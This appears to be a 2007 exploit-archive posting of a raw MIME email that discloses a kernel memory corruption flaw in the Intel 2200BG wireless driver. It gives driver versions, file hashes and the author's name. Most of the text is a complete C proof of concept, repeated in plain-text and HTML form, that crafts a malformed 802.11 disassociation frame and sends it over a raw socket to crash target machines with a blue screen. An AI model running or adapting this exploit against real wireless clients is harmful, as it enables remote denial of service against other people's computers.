Home / exploitsPDF  

intel-dos.txt

Posted on 27 January 2007

------=_Part_72042_24806074.1169818557157 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption Description: The intel wireless mini-pci driver provided with Intel 2200BG cards is vulnerable to a remote memory corruption flaw. Malformed disassociation packets can be used to corrupt internal kernel structures, causing a denial of service (BSOD) This vulnerability was found at Intel 2200 driver version 9.0.3.9 (09/12/2005). Driver files: w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725 w29mlres.dll 35afeccc4092b69f62d757c4707c74e9 w29NCPA.dll 980f58b157baedc23026dd9302406bdd Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org) Proof Of Concept: #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <asm/types.h> #include <linux/if.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <linux/if_arp.h> #include <netinet/in.h> #include <stdlib.h> #include <string.h> #include <stdio.h> // 28 bytes disassociation packet. char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal 0x00, 0x00, // Duration ID 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id 0x00, 0x00, // Frag. Number 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code int main() { struct sockaddr_ll link; struct ifreq iface; int s; char packet[sizeof(d)]; int len = 0; if((s=socket(PF_INET, SOCK_DGRAM, 0))<0) return 0; bzero(&iface,sizeof(iface)); bzero(&link,sizeof(link)); bzero(packet,sizeof(d)); strcpy(iface.ifr_name,"ath0raw"); if(ioctl(s,SIOCGIFHWADDR, &iface)) { return 0; } if(ioctl(s,SIOCGIFINDEX, &iface)) { return -1; } if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) { return -1; } link.sll_family = AF_PACKET; link.sll_ifindex = iface.ifr_ifindex; if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) { return -1; } memcpy(packet,d,sizeof(d)); len = sendto(s,packet,sizeof(d), 0, NULL, 0); usleep(5000); printf("%d bytes enviados ",len); close(s); return 0; } ------=_Part_72042_24806074.1169818557157 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline <p>Title:&nbsp; Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption</p> <p>Description:&nbsp; The intel wireless mini-pci driver provided with Intel<br>2200BG cards is vulnerable to a remote&nbsp; memory corruption flaw.<br>Malformed disassociation packets can be used to corrupt internal kernel<br>structures, causing a denial of service (BSOD) </p> <p>This vulnerability was found at Intel 2200 driver version 9.0.3.9(09/12/2005).</p> <p>Driver files:</p> <p>w29n51.sys&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 9ee38ffcb4cbe5bee6c305700ddc4725<br>w29mlres.dll&nbsp;&nbsp;&nbsp; 35afeccc4092b69f62d757c4707c74e9<br>w29NCPA.dll&nbsp;&nbsp;&nbsp;&nbsp; 980f58b157baedc23026dd9302406bdd</p> <p>Author: Breno Silva Pinto ( <a href="http://Sekure.org">Sekure.org</a> ) / bsilva[at]sekure[dot]org)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </p> <p>Proof Of Concept:</p> <p>#include &lt;unistd.h&gt;<br>#include &lt;sys/types.h&gt;<br>#include &lt;sys/socket.h&gt;<br>#include &lt;sys/ioctl.h&gt;<br>#include &lt;asm/types.h&gt;<br>#include &lt;linux/if.h&gt;<br>#include &lt;linux/if_packet.h&gt; <br>#include &lt;linux/if_ether.h&gt;<br>#include &lt;linux/if_arp.h&gt;<br>#include &lt;netinet/in.h&gt;<br>#include &lt;stdlib.h&gt;<br>#include &lt;string.h&gt;<br>#include &lt;stdio.h&gt;</p> <p>// 28 bytes disassociation packet.</p> <p>char d[] = { 0xa0, 0x00,&nbsp;&nbsp;&nbsp; // 0xa0 pacote Disassociate&nbsp; 0xa000 FC Normal<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x00, // Duration ID<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x00, // Frag. Number<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code</p> <p>int main() {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct sockaddr_ll link;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct ifreq iface;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int s;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char packet[sizeof(d)];<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int len = 0;</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if((s=socket(PF_INET, SOCK_DGRAM, 0))&lt;0)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 0;</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bzero(&amp;iface,sizeof(iface));<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bzero(&amp;link,sizeof(link));<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bzero(packet,sizeof(d));</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strcpy(iface.ifr_name,&quot;ath0raw&quot;);</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(ioctl(s,SIOCGIFHWADDR, &amp;iface)) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 0;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(ioctl(s,SIOCGIFINDEX, &amp;iface)) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))&lt;0) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; link.sll_family = AF_PACKET;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; link.sll_ifindex = iface.ifr_ifindex;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br>&nbsp;if(bind(s,(struct sockaddr *) &amp;link, sizeof(link))&lt;0) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memcpy(packet,d,sizeof(d));<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; len = sendto(s,packet,sizeof(d), 0, NULL, 0);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; usleep(5000); <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; printf(&quot;%d bytes enviados &quot;,len);</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; close(s);</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 0;<br>}</p> <p>&nbsp;</p> ------=_Part_72042_24806074.1169818557157--

 

TOP